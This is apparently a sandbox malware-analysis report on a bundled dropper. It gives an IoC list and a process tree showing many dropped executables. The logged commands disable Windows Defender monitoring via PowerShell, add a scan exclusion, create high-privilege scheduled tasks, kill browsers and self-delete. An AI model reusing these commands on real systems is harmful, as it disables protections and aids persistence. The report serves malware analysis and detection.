(compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 82 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 325 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 525 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 634 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 638 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 40 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 281 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 308 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 381 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 405 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 691 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
SmartClock.exepid process 5504 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri20a252fe0d.exeFri2060e5abb4.exepowershell.exepowershell.exepid process 2964 Fri20a252fe0d.exe 2964 Fri20a252fe0d.exe 4392 Fri2060e5abb4.exe 4392 Fri2060e5abb4.exe 4632 powershell.exe 4632 powershell.exe 4608 powershell.exe 4608 powershell.exe 4632 powershell.exe 4608 powershell.exe 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 2604 4632 powershell.exe 4632 powershell.exe 4608 powershell.exe 2604 2604 2604 2604 2604 2604 2604 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2604 -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
Fri2060e5abb4.exebk8jaAWOCs36KODatM9Ky_za.exeMicrosoftEdgeCP.exe100B.exeF698.exepid process 4392 Fri2060e5abb4.exe 5468 bk8jaAWOCs36KODatM9Ky_za.exe 4296 MicrosoftEdgeCP.exe 4296 MicrosoftEdgeCP.exe 5028 100B.exe 5404 F698.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri20dd1f5f1511478e4.exeFri20070cd68c3181d0.exepowershell.exepowershell.exeFri2064de6352.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2580 Fri20dd1f5f1511478e4.exe Token: SeCreateTokenPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeAssignPrimaryTokenPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeLockMemoryPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeIncreaseQuotaPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeMachineAccountPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeTcbPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeSecurityPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeTakeOwnershipPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeLoadDriverPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeSystemProfilePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeSystemtimePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeProfSingleProcessPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeIncBasePriorityPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeCreatePagefilePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeCreatePermanentPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeBackupPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeRestorePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeShutdownPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeDebugPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeAuditPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeSystemEnvironmentPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeChangeNotifyPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeRemoteShutdownPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeUndockPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeSyncAgentPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeEnableDelegationPrivilege 3352 Fri20070cd68c3181d0.exe Token: SeManageVolumePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeImpersonatePrivilege 3352 Fri20070cd68c3181d0.exe Token: SeCreateGlobalPrivilege 3352 Fri20070cd68c3181d0.exe Token: 31 3352 Fri20070cd68c3181d0.exe Token: 32 3352 Fri20070cd68c3181d0.exe Token: 33 3352 Fri20070cd68c3181d0.exe Token: 34 3352 Fri20070cd68c3181d0.exe Token: 35 3352 Fri20070cd68c3181d0.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 4296 Fri2064de6352.exe Token: SeDebugPrivilege 4848 taskkill.exe Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 Token: SeCreatePagefilePrivilege 2604 Token: SeShutdownPrivilege 2604 -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Fri20405c77f8562ea6.tmppid process 2244 Fri20405c77f8562ea6.tmp 2604 2604 -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 2604 6992 MicrosoftEdge.exe 5580 MicrosoftEdgeCP.exe 2440 MicrosoftEdgeCP.exe 4304 MicrosoftEdge.exe 4296 MicrosoftEdgeCP.exe 4296 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.exedescription pid process target process PID 4784 wrote to memory of 4960 4784 setup_x86_x64_install.exe setup_installer.exe PID 4784 wrote to memory of 4960 4784 setup_x86_x64_install.exe setup_installer.exe PID 4784 wrote to memory of 4960 4784 setup_x86_x64_install.exe setup_installer.exe PID 4960 wrote to memory of 4832 4960 setup_installer.exe setup_install.exe PID 4960 wrote to memory of 4832 4960 setup_installer.exe setup_install.exe PID 4960 wrote to memory of 4832 4960 setup_installer.exe setup_install.exe PID 4832 wrote to memory of 1820 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1820 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1820 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2028 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2028 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2028 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2104 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2104 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2104 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2228 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2228 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2228 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2396 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2396 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2396 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2456 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2456 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2456 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2564 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2564 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2564 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1960 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1960 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1960 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2892 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2892 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 2892 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4808 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4808 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4808 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3596 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3596 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3596 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4044 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4044 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4044 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4340 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4340 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4340 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3208 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3208 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3208 4832 setup_install.exe cmd.exe PID 2396 wrote to memory of 4728 2396 cmd.exe Fri2050c5d6de57ca396.exe PID 2396 wrote to memory of 4728 2396 cmd.exe Fri2050c5d6de57ca396.exe PID 2396 wrote to memory of 4728 2396 cmd.exe Fri2050c5d6de57ca396.exe PID 4832 wrote to memory of 4596 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4596 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 4596 4832 setup_install.exe cmd.exe PID 1820 wrote to memory of 4608 1820 cmd.exe powershell.exe PID 1820 wrote to memory of 4608 1820 cmd.exe powershell.exe PID 1820 wrote to memory of 4608 1820 cmd.exe powershell.exe PID 2028 wrote to memory of 4632 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 4632 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 4632 2028 cmd.exe powershell.exe PID 4832 wrote to memory of 1964 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1964 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 1964 4832 setup_install.exe cmd.exe PID 4832 wrote to memory of 3760 4832 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0638B476\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20bc562fa6acd.exe4⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20bc562fa6acd.exeFri20bc562fa6acd.exe5⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20070cd68c3181d0.exe4⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20070cd68c3181d0.exeFri20070cd68c3181d0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4564
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2050c5d6de57ca396.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2050c5d6de57ca396.exeFri2050c5d6de57ca396.exe5⤵
- Executes dropped EXE
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2050c5d6de57ca396.exe"C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2050c5d6de57ca396.exe" -u6⤵
- Executes dropped EXE
PID:5012
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20a252fe0d.exe4⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20a252fe0d.exeFri20a252fe0d.exe5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2002bea00b158d.exe4⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2002bea00b158d.exeFri2002bea00b158d.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2002bea00b158d.exeC:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2002bea00b158d.exe6⤵
- Executes dropped EXE
PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2002bea00b158d.exeC:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2002bea00b158d.exe6⤵
- Executes dropped EXE
PID:4872
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20405c77f8562ea6.exe4⤵PID:2564
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20405c77f8562ea6.exeFri20405c77f8562ea6.exe5⤵
- Executes dropped EXE
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\is-S0H3M.tmp\Fri20405c77f8562ea6.tmp"C:\Users\Admin\AppData\Local\Temp\is-S0H3M.tmp\Fri20405c77f8562ea6.tmp" /SL5="$90070,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20405c77f8562ea6.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20405c77f8562ea6.exe"C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20405c77f8562ea6.exe" /SILENT7⤵
- Executes dropped EXE
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\is-7M0VC.tmp\Fri20405c77f8562ea6.tmp"C:\Users\Admin\AppData\Local\Temp\is-7M0VC.tmp\Fri20405c77f8562ea6.tmp" /SL5="$40206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20405c77f8562ea6.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\is-8J17Q.tmp\winhostdll.exe"C:\Users\Admin\AppData\Local\Temp\is-8J17Q.tmp\winhostdll.exe" ss19⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4948
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2064de6352.exe4⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2064de6352.exeFri2064de6352.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2000bef28b4.exe4⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2000bef28b4.exeFri2000bef28b4.exe5⤵
- Executes dropped EXE
PID:988 -
C:\Users\Admin\AppData\Local\Temp\is-1CV3J.tmp\Fri2000bef28b4.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CV3J.tmp\Fri2000bef28b4.tmp" /SL5="$201AC,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2000bef28b4.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3300
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri209e1eb19c.exe /mixtwo4⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri209e1eb19c.exeFri209e1eb19c.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri209e1eb19c.exeFri209e1eb19c.exe /mixtwo6⤵
- Executes dropped EXE
PID:1040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri209e1eb19c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri209e1eb19c.exe" & exit7⤵PID:4660
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri209e1eb19c.exe" /f8⤵
- Kills process with taskkill
PID:1572
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri207a27f7f543e5fe.exe4⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri207a27f7f543e5fe.exeFri207a27f7f543e5fe.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri207a27f7f543e5fe.exeC:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri207a27f7f543e5fe.exe6⤵
- Executes dropped EXE
PID:684
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri208f6a10911.exe4⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri208f6a10911.exeFri208f6a10911.exe5⤵
- Executes dropped EXE
PID:352 -
C:\Users\Admin\AppData\Local\Temp\is-TO944.tmp\Fri208f6a10911.tmp"C:\Users\Admin\AppData\Local\Temp\is-TO944.tmp\Fri208f6a10911.tmp" /SL5="$7003E,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri208f6a10911.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:3308 -
C:\Users\Admin\AppData\Local\Temp\is-RB5RV.tmp\PowerOff.exe"C:\Users\Admin\AppData\Local\Temp\is-RB5RV.tmp\PowerOff.exe" /S /UID=917⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2384 -
C:\Users\Admin\AppData\Local\Temp\05-8b62a-00b-e68bf-818c06e049bb7\Sysixocija.exe"C:\Users\Admin\AppData\Local\Temp\05-8b62a-00b-e68bf-818c06e049bb7\Sysixocija.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
PID:5472
-
-
C:\Users\Admin\AppData\Local\Temp\dd-8f6ff-c63-f7ea3-c555b5702969a\Razhaemuzhysu.exe"C:\Users\Admin\AppData\Local\Temp\dd-8f6ff-c63-f7ea3-c555b5702969a\Razhaemuzhysu.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5260
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri204accdcd745.exe4⤵PID:1964
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri204accdcd745.exeFri204accdcd745.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4820 -
C:\Users\Admin\Pictures\Adobe Films\MqoHf2jmuB4cyez7G8eRpLMO.exe"C:\Users\Admin\Pictures\Adobe Films\MqoHf2jmuB4cyez7G8eRpLMO.exe"6⤵
- Executes dropped EXE
PID:1492
-
-
C:\Users\Admin\Pictures\Adobe Films\5YEspwpfQGnumbDoOap1JH2G.exe"C:\Users\Admin\Pictures\Adobe Films\5YEspwpfQGnumbDoOap1JH2G.exe"6⤵
- Executes dropped EXE
PID:5280
-
-
C:\Users\Admin\Pictures\Adobe Films\hoYJfmAmF2q6NsmBkcaOKBij.exe"C:\Users\Admin\Pictures\Adobe Films\hoYJfmAmF2q6NsmBkcaOKBij.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5268 -
C:\Users\Admin\Documents\ShWuy9fsPS26J475fKn0WgYC.exe"C:\Users\Admin\Documents\ShWuy9fsPS26J475fKn0WgYC.exe"7⤵PID:5276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1788
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bk8jaAWOCs36KODatM9Ky_za.exe"C:\Users\Admin\Pictures\Adobe Films\bk8jaAWOCs36KODatM9Ky_za.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5312 -
C:\Users\Admin\Pictures\Adobe Films\bk8jaAWOCs36KODatM9Ky_za.exe"C:\Users\Admin\Pictures\Adobe Films\bk8jaAWOCs36KODatM9Ky_za.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5468
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i8J0szz4lKwO2_miCGkGCqGv.exe"C:\Users\Admin\Pictures\Adobe Films\i8J0szz4lKwO2_miCGkGCqGv.exe"6⤵
- Executes dropped EXE
PID:5344 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 4807⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5708
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HBK5uxATsD4uE8g3Gf1IdkC6.exe"C:\Users\Admin\Pictures\Adobe Films\HBK5uxATsD4uE8g3Gf1IdkC6.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5524
-
-
C:\Users\Admin\Pictures\Adobe Films\dfQZLvXRQuh9w5xlszfs6bnt.exe"C:\Users\Admin\Pictures\Adobe Films\dfQZLvXRQuh9w5xlszfs6bnt.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5516
-
-
C:\Users\Admin\Pictures\Adobe Films\JZa9ngAV6sFw_60ELVVCYo6s.exe"C:\Users\Admin\Pictures\Adobe Films\JZa9ngAV6sFw_60ELVVCYo6s.exe"6⤵
- Executes dropped EXE
PID:5548 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
- Blocklisted process makes network request
PID:3352 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5412
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uvFnNTM_OwsWWwYVzAk2TThf.exe"C:\Users\Admin\Pictures\Adobe Films\uvFnNTM_OwsWWwYVzAk2TThf.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5764
-
-
C:\Users\Admin\Pictures\Adobe Films\PEqh7QE8FYKJ3marOyxYR5pf.exe"C:\Users\Admin\Pictures\Adobe Films\PEqh7QE8FYKJ3marOyxYR5pf.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5772
-
-
C:\Users\Admin\Pictures\Adobe Films\nTHhZBeOYunoFJqJjmEk1CVR.exe"C:\Users\Admin\Pictures\Adobe Films\nTHhZBeOYunoFJqJjmEk1CVR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵PID:2888
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2LkewQpxQSeXharHrT4UPazt.exe"C:\Users\Admin\Pictures\Adobe Films\2LkewQpxQSeXharHrT4UPazt.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:6032
-
-
C:\Users\Admin\Pictures\Adobe Films\E7eYbh2xY4wakYvRv8c04SgQ.exe"C:\Users\Admin\Pictures\Adobe Films\E7eYbh2xY4wakYvRv8c04SgQ.exe"6⤵
- Executes dropped EXE
PID:5760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 6687⤵
- Program crash
PID:6844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 6767⤵
- Program crash
PID:7112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 6327⤵
- Program crash
PID:6208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 7007⤵
- Program crash
PID:6588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 11727⤵
- Program crash
PID:6356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 11167⤵
- Program crash
PID:1652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 11647⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4900
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jdgxDHj5WbmK4kyl9sD4xYSv.exe"C:\Users\Admin\Pictures\Adobe Films\jdgxDHj5WbmK4kyl9sD4xYSv.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5740 -
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵PID:5560
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"7⤵PID:1344
-
-
C:\Program Files (x86)\Company\NewProduct\PBrowserSetp311019.exe"C:\Program Files (x86)\Company\NewProduct\PBrowserSetp311019.exe"7⤵PID:5732
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VFRPXJE3ReuR0JMXC8qDOPOb.exe"C:\Users\Admin\Pictures\Adobe Films\VFRPXJE3ReuR0JMXC8qDOPOb.exe"6⤵
- Executes dropped EXE
PID:3532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VFRPXJE3ReuR0JMXC8qDOPOb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\VFRPXJE3ReuR0JMXC8qDOPOb.exe" & del C:\ProgramData\*.dll & exit7⤵PID:4760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VFRPXJE3ReuR0JMXC8qDOPOb.exe /f8⤵
- Kills process with taskkill
PID:360
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
